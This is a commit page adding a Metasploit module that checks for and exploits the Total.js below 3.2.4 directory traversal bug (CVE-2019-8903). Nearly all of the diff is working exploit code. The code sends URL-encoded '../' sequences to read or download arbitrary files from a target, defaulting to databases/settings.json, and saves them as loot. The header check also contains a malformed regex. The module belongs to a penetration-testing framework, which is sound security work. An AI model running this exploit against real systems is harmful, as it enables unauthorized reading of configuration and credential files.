Add Total.js Directory Traversal module
parent
1bf93ab1bc
commit
eb6f0d5620
|
@ -0,0 +1,136 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
# Check and exploit Total.js Directory Traversal (CVE-2019-8903)
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
Rank = NormalRanking
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Total.js < 3.2.4 Directory Traversal',
|
||||
'Description' => %q(
|
||||
This module check and exploits a directory traversal vulnerability in Total.js < 3.2.4.
|
||||
|
||||
Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,
|
||||
woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,
|
||||
manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic
|
||||
),
|
||||
'Author' =>
|
||||
[
|
||||
'Riccardo Krauter', # Discovery
|
||||
'Fabio Cogno' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-8903'],
|
||||
['CWE', '22'],
|
||||
['URL', 'https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/'],
|
||||
['URL', 'https://snyk.io/vuln/SNYK-JS-TOTALJS-173710']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 18 2019',
|
||||
'Actions' =>
|
||||
[
|
||||
['CHECK', { 'Description' => 'Check if the target is vulnerable' }],
|
||||
['READ', { 'Description' => 'Attempt to print file content' }],
|
||||
['DOWNLOAD', { 'Description' => 'Attempt to downlaod a file' }]
|
||||
],
|
||||
'DefaultAction' => 'CHECK'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'Path to Total.js App installation', '/']),
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 1]),
|
||||
OptString.new('FILE', [true, 'File to obtain', 'databases/settings.json'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json'
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
)
|
||||
if res && res.code == 200
|
||||
json = res.get_json_document
|
||||
if json.empty? || !json['dependencies']['total.js']
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
print_status("Total.js version is: #{json['dependencies']['total.js']}")
|
||||
print_status("App name: #{json['name']}")
|
||||
print_status("App description: #{json['description']}")
|
||||
print_status("App version: #{json['version']}")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
elsif res && res.headers['X-Powered-By'] =~ [Ttoaljs]
|
||||
print_status('Target appear to be vulnerable!')
|
||||
print_status("X-Powered-By: #{res.headers['X-Powered-By']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
vprint_warning('No response')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def read
|
||||
traverse = '%2e%2e%2f' * datastore['DEPTH']
|
||||
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
)
|
||||
if res && res.code == 200
|
||||
print_status("Getting #{datastore['FILE']}...")
|
||||
print_line(res.body)
|
||||
elsif res && res.code != 200
|
||||
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
|
||||
print_error("\t1. File does not exist.")
|
||||
print_error("\t2. No permission.")
|
||||
else
|
||||
print_error("[#{target_host}] - Generic error")
|
||||
end
|
||||
end
|
||||
|
||||
def download
|
||||
traverse = '%2e%2e%2f' * datastore['DEPTH']
|
||||
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
)
|
||||
if res && res.code == 200
|
||||
fname = datastore['FILE'].split('/')[-1].chop
|
||||
ctype = res.headers['Content-Type'].split(';')
|
||||
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname)
|
||||
print_good("File #{fname} downloaded to: #{loot}")
|
||||
elsif res && res.code != 200
|
||||
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
|
||||
print_error("\t1. File does not exist.")
|
||||
print_error("\t2. No permission.")
|
||||
else
|
||||
print_error("[#{target_host}] - Generic error")
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
if action.name == 'CHECK'
|
||||
check
|
||||
|
||||
elsif action.name == 'READ'
|
||||
read
|
||||
|
||||
elsif action.name == 'DOWNLOAD'
|
||||
download
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue